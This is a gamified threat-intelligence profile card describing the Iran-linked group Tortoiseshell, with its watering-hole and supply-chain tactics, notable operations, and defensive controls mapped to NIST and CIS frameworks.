Threat Intelligence Tarot
cups · 7
Iran (IRGC-linked)
G1017★★★★★
risk 4/5
✦ The Watering Hole ✦
Tortoiseshell
Imperial Kitten · TA456 · Yellow Liderc
IT companiesDefense contractorsSaudi ArabiaIsraelKurdish communities
Active since ~2018 · IT sector compromise for downstream access, Defense contractor surveillance, Israel targeting
The Watering Hole does not go to its targets. It goes to the place its targets go - an IT support company, a defense contractor's recruiting portal, a Kurdish news website - and waits. Compromise the supplier, compromise the customer. Compromise the watering hole, drink from every cup.
Tactics & Techniques
RCN
RDV
INI
EXC
PRS
PRV
EVA
CRD
DSC
LAT
COL
C2
EXF
IMP
Notable Operations
- ◆Saudi Arabian IT company compromise for downstream customer access
- ◆Fake job recruitment lures for defense contractor targeting
- ◆LinkedIn persona operation targeting US defense industry
- ◆Israeli critical infrastructure targeting (2022)
Defenses
- ▸Third-party vendor security assessments and continuous monitoringNIST CSF: ID.SC ↗
- ▸Browser isolation for high-risk web browsingCIS Control 9 ↗
- ▸LinkedIn and social media account validation for recruiter contactsNIST CSF: PR.AT ↗
- ▸Endpoint detection for PowerShell and LOLBin abuseNIST CSF: DE.CM ↗
Reversed: Their Weakness
Tortoiseshell's supply chain approach means that when a victim IT company discovers the compromise, all of its customers must be considered potentially exposed - the resulting notification cascade can generate significant intelligence for defenders about the full scope of operations.
Share this adversary profile
swipe to browse
Related Adversaries
Data sourced from MITRE ATT&CK. For educational purposes.